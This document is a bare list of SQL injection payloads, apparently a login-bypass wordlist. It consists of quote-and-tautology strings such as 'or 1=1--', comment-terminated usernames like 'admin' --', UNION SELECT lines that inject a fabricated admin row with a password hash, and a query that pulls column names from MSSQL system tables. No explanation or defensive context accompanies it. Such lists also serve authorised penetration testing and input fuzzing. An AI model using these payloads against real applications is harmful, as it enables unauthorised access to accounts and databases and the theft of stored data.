' or "='
' or 'x'='x
" or "x"="x
') or x=x--
') or ('x'='x
') or 1=1--
0 or 1=1
' or 0=0--
" or 0=0--
' or 0=0 #
" or 0=0 #
or 0=0 #
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1-- 
' + password -- 
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
